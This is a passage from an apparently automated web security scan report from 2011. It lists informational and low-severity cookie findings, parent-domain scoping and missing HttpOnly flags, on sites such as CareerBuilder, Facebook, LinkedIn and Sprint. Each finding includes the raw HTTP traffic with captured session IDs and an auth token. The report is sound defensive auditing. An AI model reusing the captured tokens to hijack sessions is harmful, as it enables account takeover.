X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dbe0a97eaa0d435580963487f7d94f26-368400317-wg-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:17 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR17
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

13.86. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: CB_SID (sent URL-encoded as CB%5FSID) and BID (domain=.careerbuilder.com). The scanner's heuristic reports that the cookies do not appear to contain session tokens, but CB_SID has no expiry, is marked HttpOnly and is named like a session identifier, so treat it as one until the contents prove otherwise. You should review the contents of the cookies to determine their function.

Request

GET /JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34350
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=724f92f936a743f6a3638215db1bfbe7-368400317-x3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X18BA4104DA31F1C4013902035B0F149F80C4ADCFFAF0328D1678179B99F5E10F498A47E1AC5E928595C998D529EF87A26; domain=.careerbuilder.com; expires=Tue, 04-Sep-2012 01:25:16 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR39
Date: Sun, 04 Sep 2011 01:25:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US"
...[SNIP]...

13.87. http://www.facebook.com/campaign/landing.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: campaign_click_url (domain=.facebook.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Tue, 04-Oct-2011 01:26:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.194.30
Connection: close
Date: Sun, 04 Sep 2011 01:26:01 GMT
Content-Length: 0


13.88. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: next and next_path (domain=.facebook.com). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.188.39
Connection: close
Date: Sun, 04 Sep 2011 01:26:00 GMT
Content-Length: 0


13.89. http://www.facebook.com/share.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: next and next_path (domain=.facebook.com). Both are set to the value "deleted" with an Expires date in 1970, so this response clears the cookies rather than setting them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/sharer/sharer.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.200.54
Connection: close
Date: Sun, 04 Sep 2011 01:25:59 GMT
Content-Length: 0


13.90. http://www.google.com/insights/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /insights/search/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: S (Domain=.google.com). The I4SUserLocale cookie in the same response carries no Domain attribute and is host-only, so it is not part of this finding. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /insights/search/ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=google+trend+top+search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 200 OK
Set-Cookie: I4SUserLocale=en_US; Expires=Mon, 03-Sep-2012 00:41:06 GMT; Path=/insights/search; HttpOnly
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 00:41:06 GMT
Expires: Sun, 04 Sep 2011 00:41:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 139384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="icon" type="image/gif" href="/insights/search/resou
...[SNIP]...

13.91. https://www.linkedin.com/secure/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: lang (Domain=linkedin.com). The leo_auth_token cookie in the same response is plainly an authentication token, but it carries no Domain attribute and is therefore host-only, so it is not part of this finding. The lang cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

13.92. http://www.myspace.com/Modules/PostTo/Pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: MSCulture (domain=.myspace.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: 9fd3a6d53bb05cb31e6d757d4c5a9f0864a042db68c9cdb0
Set-Cookie: MSCulture=IP=50.23.123.106&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sun, 11-Sep-2011 01:26:20 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Pimple Faced Geeks
Date: Sun, 04 Sep 2011 01:26:20 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

13.93. http://www.sacbee.com/reg_js/access_check.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg_js/access_check.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: vmix_core_user_info (domain=.sacbee.com, path=/vmix_hosted_apps). Its Expires date of 09-Sep-2010 is a year before the response Date, so this header clears the cookie rather than setting it. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reg_js/access_check.js HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Wed, 21 Sep 2005 15:09:45 GMT
ETag: "108293-4b-433177b9"
Accept-Ranges: bytes
Content-Length: 75
Content-Type: application/x-javascript
Cache-Control: max-age=0
Date: Sun, 04 Sep 2011 01:27:14 GMT
Connection: close
Set-Cookie: vmix_core_user_info=.null; domain=.sacbee.com; path=/vmix_hosted_apps; expires=Thu, 09-Sep-2010 01:27:14 GMT

// $Id: access_denied.js 302 2005-09-21 15:09:45Z shilton $
verified=true;

13.94. http://www.wtp101.com/pull_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: tuuid (domain=.wtp101.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=adaptv HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:15:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://sync.adap.tv/sync?type=gif&key=adnetik&uid=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 03 Sep 2013 01:15:38 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


13.95. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: GEO=9fbf89003429ef13c94fa32a778173c7cwsAAAAzVVMyF3tqTmLURA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: pVGtMNkNySllZZy1xcllLQ0JZZ1g0UGpZSkVpdS1YZ29NZ1pFdVRSWG1CdHU5QndvLVZkUjRB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

14. Cookie without HttpOnly flag set
There are 159 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



14.1. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /quickquestion/jquery/1.0.1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quickquestion/jquery/1.0.1.html HTTP/1.1
Host: content.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11774
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSQQCBBA=DNBPNDFBIOJCBKPGCEBKCEBJ; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:22:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <script t
...[SNIP]...

14.2. http://findnsave.sacbee.com/api/aacoupons.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://findnsave.sacbee.com
Path:   /api/aacoupons.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/aacoupons.json HTTP/1.1
Host: findnsave.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-AspNet-Version: 2.0.50727
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
Set-Cookie: LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:32 GMT; path=/
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:31 GMT
Connection: close
Content-Length: 6785


{ "result": { "coupon": [ {"address": "1714 16th Street", "advertiserId": "22883", "advertiserLogoUrl": "http://logos.advertisers.analoganalytics.com/production/22883/standard.png?1303423785", "adve
...[SNIP]...

14.3. http://findnsave.sacbee.com/api/groupon.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://findnsave.sacbee.com
Path:   /api/groupon.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/groupon.json HTTP/1.1
Host: findnsave.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-AspNet-Version: 2.0.50727
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
Set-Cookie: LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:29 GMT; path=/
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:28 GMT
Connection: close
Content-Length: 927


{ "result": {"deal": {"announcementTitle": "Up to 63% Off International Fare at Casino Royale", "bestPrice": "$12", "dealUrl": "http://findnsave.sacbee.com/Deal/25964/Casino-Royale", "id": "25964",
...[SNIP]...

14.4. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.barnesandnoble.com
Path:   /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 HTTP/1.1
Host: search.barnesandnoble.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, no-store
Content-Type: text/html; charset=utf-8
Content-Length: 122283
Date: Sun, 04 Sep 2011 01:23:43 GMT
Connection: close
Set-Cookie: pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
Set-Cookie: pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
Set-Cookie: pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/

...<!DOCTYPE html SYSTEM "about:legacy-compat"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="description" content="BARNES &amp; NOBLE: The Sacramento Bee b
...[SNIP]...

14.5. http://shop.sprint.com/mysprint/shop/phone_wall.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shop.sprint.com
Path:   /mysprint/shop/phone_wall.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysprint/shop/phone_wall.jsp HTTP/1.1
Host: shop.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:23:54 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Location: http://shop.sprint.com/mysprint/zipcode_intercept.jsp;jsessionid=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41?redirectURL=http%3A%2F%2Fshop.sprint.com%2Fmysprint%2Fshop%2Fphone_wall.jsp&_requestid=45835
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP=" NOI DSP COR NID PSA OUR IND COM NAV STA "
Connection: close
Content-Type: text/plain; charset=UTF-8


14.6. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Low
Confidence:   Firm
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:07 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

14.7. http://trc.taboolasyndication.com/reuters/trc/2/json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /reuters/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
